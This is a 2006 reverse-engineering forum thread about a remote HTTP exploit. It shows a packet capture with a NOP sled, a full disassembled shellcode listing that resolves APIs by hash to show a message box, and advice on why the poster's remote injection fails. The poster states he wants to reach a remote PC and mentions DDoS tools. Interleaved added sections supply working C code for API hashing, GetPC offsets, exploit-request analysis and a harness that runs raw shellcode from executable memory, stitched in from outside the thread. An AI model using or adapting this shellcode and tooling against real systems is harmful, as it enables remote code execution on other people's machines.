Exploit


dcskm4200
August 1st, 2006, 01:24
Hello, all.
I have a question about a remote exploit.
I wonder, is it allowed to talk about it here?

best regards

dELTA
August 1st, 2006, 02:44
Sure, no problem. Go ahead, and just try to follow the rules in general. And if all else fails, we'll tell you if you do something wrong and spank you a bit.

dcskm4200
August 1st, 2006, 03:42
Hey, dELTA,
OK, thanks.
First of all, if you are not happy, don't take me into limbo like SPOOK does.
Here are the packets captured while running it.
Code:

>>>-------- Index: 0 ---------<<<
48 bytes packet size;
ID: 51976, TTL: 128, Protocol: TCP, Sum: 58845
Src.: 100.100.100.35, Dst.: 100.100.100.106
SPort: 1081, DPort: 59350
Data (easy-to-read):
?
Data (hex view):
02 04 05 B4 01 01 04 02

>>>-------- Index: 1 ---------<<<
40 bytes packet size;
ID: 52232, TTL: 128, Protocol: TCP, Sum: 60637
Src.: 100.100.100.35, Dst.: 100.100.100.106
SPort: 1081, DPort: 59350
Data (easy-to-read):

Data (hex view):


>>>-------- Index: 2 ---------<<<
48 bytes packet size;
ID: 29777, TTL: 64, Protocol: TCP, Sum: 15637
Src.: 100.100.100.106, Dst.: 100.100.100.35
SPort: 59350, DPort: 1081
Data (easy-to-read):
?
Data (hex view):
02 04 05 B4 01 01 04 02

>>>-------- Index: 3 ---------<<<
1040 bytes packet size;
ID: 52488, TTL: 128, Protocol: TCP, Sum: 986
Src.: 100.100.100.35, Dst.: 100.100.100.106
SPort: 1081, DPort: 59350
Data (easy-to-read):
GET /   »2ShUλUUUUΌυOμUUUUθ萐ΜΜΜΜΜΜΜΜΜΜ”όHTTP/1.0’ό.............................................................................................. .............
Data (hex view):
47 45 54 20 2F 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9

>>>-------- Index: 4 ---------<<<
40 bytes packet size;
ID: 52744, TTL: 128, Protocol: TCP, Sum: 60125
Src.: 100.100.100.35, Dst.: 100.100.100.106
SPort: 1081, DPort: 59350
Data (easy-to-read):

Data (hex view):


>>>-------- Index: 5 ---------<<<
40 bytes packet size;
ID: 30033, TTL: 64, Protocol: TCP, Sum: 17429
Src.: 100.100.100.106, Dst.: 100.100.100.35
SPort: 59350, DPort: 1081
Data (easy-to-read):

Data (hex view):


>>>-------- Index: 6 ---------<<<
40 bytes packet size;
ID: 53000, TTL: 128, Protocol: TCP, Sum: 59869
Src.: 100.100.100.35, Dst.: 100.100.100.106
SPort: 1081, DPort: 59350
Data (easy-to-read):

Data (hex view):


>>>-------- Index: 7 ---------<<<
52 bytes packet size;
ID: 30289, TTL: 64, Protocol: TCP, Sum: 14101
Src.: 100.100.100.106, Dst.: 100.100.100.35
SPort: 59350, DPort: 1081
Data (easy-to-read):
RFB 003.008

Data (hex view):
52 46 42 20 30 30 33 2E 30 30 38 0A

8 packets sniffed (bytes: 1348)...

The IP addresses have been edited by me.
The code can't work on my PC.

dELTA
August 1st, 2006, 05:41
You must post more info about what this really is, and what your exact question is.

dcskm4200
August 1st, 2006, 07:30
Hey, dELTA,
Actually, I know nothing.
It is about a remote exploit.
I think the code can't work.
prepare + shellcode + exitCondition + crap =
Code:
00401000 . BB 32536855 MOV EBX,55685332
00401005 . 81EB 55555555 SUB EBX,55555555
0040100B . BC F54F81EC MOV ESP,EC814FF5
00401010 . 55 PUSH EBP
00401011 . 55 PUSH EBP
00401012 . 55 PUSH EBP
00401013 . 55 PUSH EBP
00401014 . E8 00000000 CALL test_2.00401019
00401019 /$ 5F POP EDI
0040101A |. 81EF 1E104000 SUB EDI,test_2.0040101E
00401020 |. 8D87 94104000 LEA EAX,DWORD PTR DS:[EDI+401094]
00401026 |. 50 PUSH EAX
00401027 |. E8 83000000 CALL test_2.004010AF
0040102C |. 8D87 A5104000 LEA EAX,DWORD PTR DS:[EDI+4010A5]
00401032 |. 50 PUSH EAX
00401033 |. E8 77000000 CALL test_2.004010AF
00401038 |. 2BC0 SUB EAX,EAX
0040103A |. 50 PUSH EAX
0040103B |. 8D9F 83104000 LEA EBX,DWORD PTR DS:[EDI+401083]
00401041 |. 53 PUSH EBX
00401042 |. 8D9F 5E104000 LEA EBX,DWORD PTR DS:[EDI+40105E]
00401048 |. 53 PUSH EBX
00401049 |. 50 PUSH EAX
0040104A |. FF97 AC104000 CALL DWORD PTR DS:[EDI+4010AC]
00401050 |. 6A 00 PUSH 0
00401052 |. FF97 9D104000 CALL DWORD PTR DS:[EDI+40109D]
00401058 \. C3 RETN
00401059 . 5B 2A 5D 20 48 65 6C 6C 6F 20 57 6F 72 6C 64 20 ASCII "[*] Hello World "
00401069 . 43 6F 64 65 72 21 20 28 43 29 20 41 6E 73 6B 79 ASCII "Coder! (C) Ansky"
00401079 . 61 2E 0D 0A 00 ASCII "a.",CR,LF,0
0040107E . 4D 73 67 42 6F 78 20 42 79 20 41 6E 73 6B 79 61 ASCII "MsgBox By Anskya"
0040108E . 00 ASCII 0
0040108F . 6B 65 72 6E 65 6C 33 32 00 ASCII "kernel32",0
00401098 01 DB 01
00401099 92 DB 92
0040109A 8F DB 8F
0040109B 05 DB 05
0040109C 00 DB 00
0040109D . 00000075 DD 75000000
004010A1 . 73 65 72 33 32 00 ASCII "ser32",0
004010A7 F7 DB F7
004010A8 6C DB 6C ; CHAR 'l'
004010A9 55 DB 55 ; CHAR 'U'
004010AA D8 DB D8
004010AB 00 DB 00
004010AC 00 DB 00
004010AD 00 DB 00
004010AE 00 DB 00
004010AF /$ 60 PUSHAD
004010B0 |. 8B7424 24 MOV ESI,DWORD PTR SS:[ESP+24]
004010B4 |. E8 97000000 CALL test_2.00401150
004010B9 |. 68 ADD13441 PUSH 4134D1AD
004010BE |. 50 PUSH EAX
004010BF |. E8 1F000000 CALL test_2.004010E3
004010C4 |. 56 PUSH ESI
004010C5 |. FFD0 CALL EAX
004010C7 |. 8BD8 MOV EBX,EAX
004010C9 |. 2BC0 SUB EAX,EAX
004010CB |> AC /LODS BYTE PTR DS:[ESI]
004010CC |. 84C0 |TEST AL,AL
004010CE |.^75 FB \JNZ SHORT test_2.004010CB
004010D0 |. 8BFE MOV EDI,ESI
004010D2 |> AD /LODS DWORD PTR DS:[ESI]
004010D3 |. 85C0 |TEST EAX,EAX
004010D5 |. 74 0A |JE SHORT test_2.004010E1
004010D7 |. 50 |PUSH EAX
004010D8 |. 53 |PUSH EBX
004010D9 |. E8 05000000 |CALL test_2.004010E3
004010DE |. AB |STOS DWORD PTR ES:[EDI]
004010DF |.^EB F1 \JMP SHORT test_2.004010D2
004010E1 |> 61 POPAD
004010E2 \. C3 RETN
004010E3 /$ 60 PUSHAD
004010E4 |. 8B5C24 24 MOV EBX,DWORD PTR SS:[ESP+24]
004010E8 |. 8B7424 28 MOV ESI,DWORD PTR SS:[ESP+28]
004010EC |. 2BED SUB EBP,EBP
004010EE |. 8BD3 MOV EDX,EBX
004010F0 |. 0352 3C ADD EDX,DWORD PTR DS:[EDX+3C]
004010F3 |. 8B52 78 MOV EDX,DWORD PTR DS:[EDX+78]
004010F6 |. 03D3 ADD EDX,EBX
004010F8 |. 8B42 18 MOV EAX,DWORD PTR DS:[EDX+18]
004010FB |. 8B7A 1C MOV EDI,DWORD PTR DS:[EDX+1C]
004010FE |. 03FB ADD EDI,EBX
00401100 |. 8B7A 20 MOV EDI,DWORD PTR DS:[EDX+20]
00401103 |. 03FB ADD EDI,EBX
00401105 |. 52 PUSH EDX
00401106 |. 8BD7 MOV EDX,EDI
00401108 |> 8B17 /MOV EDX,DWORD PTR DS:[EDI]
0040110A |. 03D3 |ADD EDX,EBX
0040110C |. 45 |INC EBP
0040110D |. 60 |PUSHAD
0040110E |. 8BF2 |MOV ESI,EDX
00401110 |. 2BC9 |SUB ECX,ECX
00401112 |> AC |/LODS BYTE PTR DS:[ESI]
00401113 |. 41 ||INC ECX
00401114 |. 84C0 ||TEST AL,AL
00401116 |.^75 FA |\JNZ SHORT test_2.00401112
00401118 |. 894C24 18 |MOV DWORD PTR SS:[ESP+18],ECX
0040111C |. 61 |POPAD
0040111D |. 60 |PUSHAD
0040111E |. 2BC0 |SUB EAX,EAX
00401120 |. E8 51000000 |CALL test_2.00401176
00401125 |. 3BC6 |CMP EAX,ESI
00401127 |. 61 |POPAD
00401128 |. 74 08 |JE SHORT test_2.00401132
0040112A |. 83C7 04 |ADD EDI,4
0040112D |. 48 |DEC EAX
0040112E |. 74 18 |JE SHORT test_2.00401148
00401130 |.^EB D6 \JMP SHORT test_2.00401108
00401132 |> 5A POP EDX
00401133 |. 4D DEC EBP
00401134 |. 8B4A 24 MOV ECX,DWORD PTR DS:[EDX+24]
00401137 |. 03CB ADD ECX,EBX
00401139 |. 0FB70469 MOVZX EAX,WORD PTR DS:[ECX+EBP*2]
0040113D |. 8B6A 1C MOV EBP,DWORD PTR DS:[EDX+1C]
00401140 |. 03EB ADD EBP,EBX
00401142 |. 8B4485 00 MOV EAX,DWORD PTR SS:[EBP+EAX*4]
00401146 |. 03C3 ADD EAX,EBX
00401148 |> 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
0040114C |. 61 POPAD
0040114D \. C2 0800 RETN 8
00401150 /$ 60 PUSHAD
00401151 |. 2BC0 SUB EAX,EAX
00401153 |. 64:8B40 30 MOV EAX,DWORD PTR FS:[EAX+30]
00401157 |. 85C0 TEST EAX,EAX
00401159 |. 78 0C JS SHORT test_2.00401167
0040115B |. 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
0040115E |. 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]
00401161 |. AD LODS DWORD PTR DS:[ESI]
00401162 |. 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]
00401165 |. EB 09 JMP SHORT test_2.00401170
00401167 |> 8B40 34 MOV EAX,DWORD PTR DS:[EAX+34]
0040116A |. 8D40 7C LEA EAX,DWORD PTR DS:[EAX+7C]
0040116D |. 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C]
00401170 |> 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00401174 |. 61 POPAD
00401175 \. C3 RETN
00401176 /$ 60 PUSHAD
00401177 |. E3 18 JECXZ SHORT test_2.00401191
00401179 |. F7D0 NOT EAX
0040117B |> 3202 /XOR AL,BYTE PTR DS:[EDX]
0040117D |. 42 |INC EDX
0040117E |. B3 08 |MOV BL,8
00401180 |> D1E8 |/SHR EAX,1
00401182 |. 73 05 ||JNB SHORT test_2.00401189
00401184 |. 35 2083B8ED ||XOR EAX,EDB88320
00401189 |> FECB ||DEC BL
0040118B |.^75 F3 |\JNZ SHORT test_2.00401180
0040118D |.^E2 EC \LOOPD SHORT test_2.0040117B
0040118F |. F7D0 NOT EAX
00401191 |> 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00401195 |. 61 POPAD
00401196 \. C3 RETN

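
The routine at 00401176 is the piece of the listing worth pinning down, because everything else in the payload hinges on it: the resolver at 004010E3 walks the export name table and compares each name's hash against the DWORD it was handed (pushed at 004010B9, or read from the tables behind "kernel32",0 and "user32",0). The program below is an added example, written for this page and not taken from the thread; it re-implements that hash byte for byte in C so the constants in the listing can be checked against real export names. The candidate names it tries are my assumption, not something the poster stated; the hash constants and the fact that the NUL terminator is included in the hashed length are read straight from the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Re-implementation of the loop at 00401176: EAX starts at 0 and is NOT-ed
 * (0xFFFFFFFF), each byte is XOR-ed into AL, eight reflected shift-and-XOR
 * steps with 0xEDB88320 follow (SHR EAX,1 / JNB / XOR EAX,EDB88320), and
 * the result is NOT-ed again. That is plain CRC-32 as zlib computes it. */
uint32_t crc32_ieee(const uint8_t *data, size_t len)
{
    uint32_t crc = ~0u;                       /* NOT EAX, EAX was 0 */
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];                       /* XOR AL,BYTE PTR [EDX] */
        for (int bit = 0; bit < 8; bit++) {   /* MOV BL,8 ... DEC BL / JNZ */
            if (crc & 1)                      /* CF from SHR EAX,1 */
                crc = (crc >> 1) ^ 0xEDB88320u;
            else
                crc >>= 1;
        }
    }
    return ~crc;                              /* final NOT EAX */
}

/* The caller (00401112-00401116) does INC ECX before TEST AL,AL, so the
 * length handed to the hash is strlen(name) + 1: the NUL byte is hashed too. */
uint32_t api_hash(const char *name)
{
    return crc32_ieee((const uint8_t *)name, strlen(name) + 1);
}

/* Hash constants read out of the listing: the DWORD pushed at 004010B9 and
 * the little-endian DWORDs that follow "kernel32",0 (00401098) and
 * "user32",0 (004010A7). After resolution the latter two slots are
 * overwritten with the function addresses (STOS at 004010DE). */
static const uint32_t hash_pushed_at_4010B9 = 0x4134D1ADu;
static const uint32_t hash_after_kernel32  = 0x058F9201u;
static const uint32_t hash_after_user32    = 0xD8556CF7u;

/* Candidate export names are my guess, not something the page states; the
 * function reports which one, if any, hashes to `want`. */
const char *name_for_hash(uint32_t want)
{
    static const char *const candidates[] = {
        "LoadLibraryA", "GetProcAddress", "ExitThread", "ExitProcess",
        "MessageBoxA", "MessageBoxW", NULL
    };
    for (size_t i = 0; candidates[i]; i++)
        if (api_hash(candidates[i]) == want)
            return candidates[i];
    return NULL;
}

int main(void)
{
    const uint32_t wanted[] = { hash_pushed_at_4010B9, hash_after_kernel32,
                                hash_after_user32 };
    for (size_t i = 0; i < sizeof wanted / sizeof wanted[0]; i++) {
        const char *n = name_for_hash(wanted[i]);
        printf("%08X -> %s\n", wanted[i], n ? n : "(none of the candidates)");
    }
    return 0;
}
```

If a constant matches none of the candidates, extend the list with the export names of the DLL in question rather than guessing further; the hash is ordinary CRC-32, so any tool that computes it over the name plus its terminating NUL will give the same answer.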

dcskm4200
August 1st, 2006, 08:15
I made a simple HTTP server.
In test_1.exe, I set port = 80 and szRemote = the simple HTTP server's IP address.
test_1.exe can close the simple HTTP server, but can't display the msgbox.

best regards

dELTA
August 1st, 2006, 17:21
Ok, you say you "know nothing", but hopefully you do at least know exactly what you want to ask, or accomplish, by posting this thread? I still don't see any question in there, so exactly what is it that you want us to reply or do?

naides
August 1st, 2006, 18:11
A true reverser will have to decipher these postings, read this guy's mind and figure out what the fuck he is up to...

Where's evaluator?

sHice
August 1st, 2006, 18:57
He wants to know why the shellcode can shut down the HTTP server but doesn't display a message box like it's supposed to. I tried executing the shellcode starting at 00401014 and it works like it is supposed to here: it displays a message box and exits the thread with ExitThread afterwards. I could not test it with an HTTP server because I'm not into this kind of stuff, but the shellcode worked when executing it in a MASM-compiled app. If you have set up a server on your own machine, you could simply debug it and watch what's happening when the shellcode is received.
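
The address sHice starts at, 00401014, is the CALL $+5 / POP EDI / SUB EDI,0040101E stub that makes the payload position independent, and it explains something that looks wrong when reading the listing: LEA EAX,[EDI+401094] is used to reach "kernel32", which sits at 0040108F, five bytes earlier. The SUB constant (40101E instead of 401019) folds that five-byte skew into EDI, so every operand lands on its data wherever the blob is loaded. The following C program is an added example (mine, not from the thread) that carries the arithmetic through for all six [EDI+imm] operands at several hypothetical load addresses; the operands and the item offsets are taken from the listing, the load addresses are invented.

```c
#include <stdint.h>
#include <stdio.h>

/* The listing comes from an image assembled at 0x401000; all LEA/CALL
 * operands are absolute addresses inside that image. */
#define IMAGE_BASE 0x401000u

/* CALL $+5 at 00401014 pushes the runtime address of 00401019, POP EDI
 * takes it, SUB EDI,0040101E leaves EDI = (runtime base - 0x401000) - 5. */
uint32_t getpc_edi(uint32_t runtime_base)
{
    uint32_t pushed = runtime_base + (0x401019u - IMAGE_BASE);
    return pushed - 0x40101Eu;
}

/* Runtime address an [EDI+imm] operand resolves to. */
uint32_t operand_target(uint32_t runtime_base, uint32_t imm)
{
    return getpc_edi(runtime_base) + imm;
}

/* The same target as an offset into the blob: with the -5 folded into the
 * SUB constant, every imm lands five bytes before its own image address. */
uint32_t blob_offset(uint32_t runtime_base, uint32_t imm)
{
    return operand_target(runtime_base, imm) - runtime_base;
}

typedef struct { uint32_t imm; uint32_t want; const char *what; } operand;

/* Operands copied from the listing and the blob offset (image address minus
 * 0x401000) of the item each one must hit. */
static const operand table[] = {
    { 0x401094u, 0x8F, "\"kernel32\",0 handed to the loader"             },
    { 0x4010A5u, 0xA0, "\"user32\",0 handed to the loader"               },
    { 0x401083u, 0x7E, "\"MsgBox By Anskya\" caption"                     },
    { 0x40105Eu, 0x59, "\"[*] Hello World Coder! ...\" text"              },
    { 0x4010ACu, 0xA7, "slot after \"user32\": resolved MessageBoxA"      },
    { 0x40109Du, 0x98, "slot after \"kernel32\": resolved ExitThread"     },
};
#define TABLE_LEN (sizeof table / sizeof table[0])

/* Number of operands that hit their item when the blob sits at runtime_base. */
size_t operands_ok(uint32_t runtime_base)
{
    size_t ok = 0;
    for (size_t i = 0; i < TABLE_LEN; i++)
        ok += blob_offset(runtime_base, table[i].imm) == table[i].want;
    return ok;
}

int main(void)
{
    /* Invented load addresses: the assembled base, a stack-like address and
     * a heap-like one. The offsets must come out identical for all three. */
    const uint32_t bases[] = { 0x00401000u, 0x0012F9A0u, 0x7FFD3000u };
    for (size_t b = 0; b < sizeof bases / sizeof bases[0]; b++) {
        printf("blob at %08X: EDI = %08X, %zu/%zu operands hit\n", bases[b],
               getpc_edi(bases[b]), operands_ok(bases[b]), TABLE_LEN);
        for (size_t i = 0; i < TABLE_LEN; i++)
            printf("  [EDI+%08X] -> +%02X %s\n", table[i].imm,
                   blob_offset(bases[b], table[i].imm), table[i].what);
    }
    return 0;
}
```

The practical consequence for testing is the one sHice found: the blob works from any address, but only if execution enters at the CALL at 00401014. The three instructions before it load EBX and overwrite ESP with a constant, which a stand-alone test app must skip.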

JMI
August 1st, 2006, 19:14
I agree that it is time for dcskm4200 to get his act together and figure out how to actually ask a question, instead of posting code and confusing and/or incomplete statements.

Regards,

dcskm4200
August 2nd, 2006, 02:07
Thanks to all who answered the question.

Don't worry, if I want to do something, I have already done it, because Google University not only provides homework, but also provides usable DDoS.

All is in the source code.
I think finding the question is more difficult than figuring it out. If I knew where the error is, maybe I would have figured it out.
I want to display a message "Hey,baby. i'm coming!" on the remote PC.

@sHice:
You have read the code. You gave me a valuable method.
I haven't any experience with remote debugging.

best regards

dELTA
August 2nd, 2006, 03:34
Ok, brushing off old mind-reading powers...

My guess is that you're under the impression that a remote exploit works on any program or server type/version that you send it to? But you see, an exploit like this only works on a very specific server brand and version, having a special vulnerability that the exploit uses to get the code to execute. The hard part is always to get the other computer to execute your code in the first place; the rest is a piece of cake.

So, even if this code is perfectly working, the injection vector might not be. See what I mean?
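
Before blaming the payload it pays to look at what the far end actually speaks. As an added example (my code, not from the thread), the C program below triages the two directions of the capture posted above: for the request it measures the 0x90 sled after "GET /", finds where the code starts and whether an "HTTP/1." marker follows it, as in packet 3; for the reply it classifies the server's first bytes. The request it analyzes is constructed (only the six-byte GetPC stub from the listing stands in for the whole payload). The server bytes are the twelve from packet 7's hex view, which decode to "RFB 003.008\n": that is the ProtocolVersion string an RFB (VNC) server sends on connect, not an HTTP status line, so in that trace the service on port 59350 was not answering as a web server.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shape of a request line that carries a NOP sled and code, as in packet 3. */
typedef struct {
    size_t sled_len;     /* 0x90 bytes directly after "GET /" */
    size_t code_off;     /* offset of the first byte that is not 0x90 */
    size_t code_len;     /* bytes from code_off up to "HTTP/1." (or to the end) */
    int    has_version;  /* 1 if an "HTTP/1." marker follows the code */
} request_shape;

/* Offset of `needle` inside hay[0..n), or -1. Written out because memmem()
 * is not in the C standard. */
static long find_bytes(const uint8_t *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return (long)i;
    return -1;
}

/* Returns 1 and fills *out when p[0..n) starts with "GET /", else 0. */
int analyze_request(const uint8_t *p, size_t n, request_shape *out)
{
    static const char prefix[] = "GET /";
    const size_t plen = sizeof prefix - 1;
    if (n < plen || memcmp(p, prefix, plen) != 0)
        return 0;
    size_t i = plen;
    while (i < n && p[i] == 0x90)            /* walk the sled */
        i++;
    out->sled_len = i - plen;
    out->code_off = i;
    long v = find_bytes(p + i, n - i, "HTTP/1.");
    out->has_version = v >= 0;
    out->code_len = v >= 0 ? (size_t)v : n - i;
    return 1;
}

/* What the far end said first. An RFB (VNC) server opens with its
 * "RFB xxx.yyy\n" ProtocolVersion message; an HTTP server with a status line. */
const char *classify_banner(const uint8_t *p, size_t n)
{
    if (n >= 4 && memcmp(p, "RFB ", 4) == 0)  return "RFB (VNC) ProtocolVersion";
    if (n >= 5 && memcmp(p, "HTTP/", 5) == 0) return "HTTP status line";
    return "unknown";
}

/* Constructed stand-in for packet 3: "GET /", a 200-byte sled, the six-byte
 * GetPC stub from the listing in place of the whole payload, then "HTTP/1.0"
 * and filler. Returns the length written, 0 if `cap` is too small. */
size_t build_sample_request(uint8_t *buf, size_t cap)
{
    static const uint8_t stub[] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5F };
    static const char tail[] = "HTTP/1.0....................";
    size_t n = 5 + 200 + sizeof stub + (sizeof tail - 1);
    if (cap < n) return 0;
    memcpy(buf, "GET /", 5);
    memset(buf + 5, 0x90, 200);
    memcpy(buf + 205, stub, sizeof stub);
    memcpy(buf + 205 + sizeof stub, tail, sizeof tail - 1);
    return n;
}

/* Packet 7 exactly as its hex view shows it. */
static const uint8_t packet7[] = {
    0x52, 0x46, 0x42, 0x20, 0x30, 0x30, 0x33, 0x2E, 0x30, 0x30, 0x38, 0x0A
};

/* Analyze the constructed request; an all-zero shape if building failed. */
request_shape analyze_sample(void)
{
    uint8_t req[512];
    request_shape s = { 0, 0, 0, 0 };
    size_t n = build_sample_request(req, sizeof req);
    if (n) analyze_request(req, n, &s);
    return s;
}

int main(void)
{
    request_shape s = analyze_sample();
    printf("request: sled %zu bytes, code at +%zu (%zu bytes), HTTP/1. marker %s\n",
           s.sled_len, s.code_off, s.code_len, s.has_version ? "present" : "absent");
    printf("server's first bytes: %s\n", classify_banner(packet7, sizeof packet7));
    return 0;
}
```

Feed analyze_request() the real payload of packet 3 and classify_banner() the first bytes of whatever the target sends back; if the banner is not the protocol the exploit was written for, the injection vector is the problem, exactly as dELTA describes, and no change to the shellcode will help.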

dcskm4200
August 2nd, 2006, 09:17
Hey, dELTA,
Thanks for your response.

You are absolutely right.

But an OS vulnerability is universal for using a remote exploit. Most users don't know how to use it. For example, updating the OS remotely (of course, this isn't an exploit, it is a backdoor).

best regards

laola
August 4th, 2006, 03:21
Universal, huh? Then go right ahead and exploit my C64.

dcskm4200
August 4th, 2006, 06:55
It seems you are strong now.

deroko
August 6th, 2006, 16:56
Quote:
[Originally Posted by dcskm4200]
I haven't any experience with remote debugging.


Well, install that HTTP server on your machine, and store an int 3h at the beginning of the shellcode. If you have the right ret value overwritten, or you have used a stack overflow attack with the right address, SoftICE (bpint 3 or i3here on) should pop up when the int 3h in the shellcode occurs, and you may debug your shellcode without a problem and figure out where it fails.
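
The two debugging methods offered in this thread, sHice's stand-alone test app and deroko's int 3h at the start of the shellcode, fit in one small harness. The C program below is an added example written for this page (not code from any poster): it reads the raw shellcode bytes from a file, optionally prepends INT 3 so a debugger catches the payload on its first instruction, copies the image into memory that is both writable and executable, and calls it. The file name, the --int3 switch and the 4 KiB limit are my choices. For the payload in this thread it must be built as a 32-bit x86 binary (for example gcc -m32 or a 32-bit cl build) and the saved bytes should start at 00401014, as sHice did, since the three instructions before that overwrite ESP with a constant.

```c
#define _DEFAULT_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#endif

/* Lay out the image to run: with `break_on_entry` an INT 3 (0xCC) goes in
 * front of the shellcode, so a debugger that catches int 3 (SoftICE with
 * "i3here on" or "bpint 3", or any user-mode debugger attached to this
 * process) stops before the payload's first instruction.
 * Returns the image length, 0 if `cap` is too small. */
size_t build_test_image(const uint8_t *sc, size_t sc_len, int break_on_entry,
                        uint8_t *out, size_t cap)
{
    size_t extra = break_on_entry ? 1 : 0;
    if (sc_len + extra > cap)
        return 0;
    if (break_on_entry)
        out[0] = 0xCC;                        /* INT 3 */
    memcpy(out + extra, sc, sc_len);
    return sc_len + extra;
}

/* Copy the image into memory that is both writable and executable and call
 * it like a function, which is what a MASM test app does. A payload that
 * ends in ExitThread never returns here. */
int run_image(const uint8_t *img, size_t len)
{
#ifdef _WIN32
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return -1;
#else
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
#endif
    memcpy(mem, img, len);
    ((void (*)(void))mem)();
    return 0;
}

/* Load the raw bytes saved from the debugger (a binary copy of the range to
 * test). Returns the byte count, 0 on failure. */
size_t read_shellcode(const char *path, uint8_t *buf, size_t cap)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL) return 0;
    size_t n = fread(buf, 1, cap, f);
    fclose(f);
    return n;
}

int main(int argc, char **argv)
{
    uint8_t sc[4096], img[sizeof sc + 1];
    if (argc < 2) {
        fprintf(stderr, "usage: %s shellcode.bin [--int3]\n", argv[0]);
        return 1;
    }
    size_t n = read_shellcode(argv[1], sc, sizeof sc);
    if (n == 0) { perror(argv[1]); return 1; }
    int brk = argc > 2 && strcmp(argv[2], "--int3") == 0;
    size_t len = build_test_image(sc, n, brk, img, sizeof img);
    return run_image(img, len) == 0 ? 0 : 1;
}
```

Run it under the debugger with --int3 and the breakpoint fires before the GetPC stub, so the PEB walk, the hash comparison and the two LoadLibraryA calls can be single-stepped. Without a debugger attached the INT 3 is an unhandled exception, so leave the switch off for a plain run. Because the payload finishes with ExitThread on the harness's only thread, the process ends once the message box is dismissed; that matches what sHice observed and is not a fault in the shellcode.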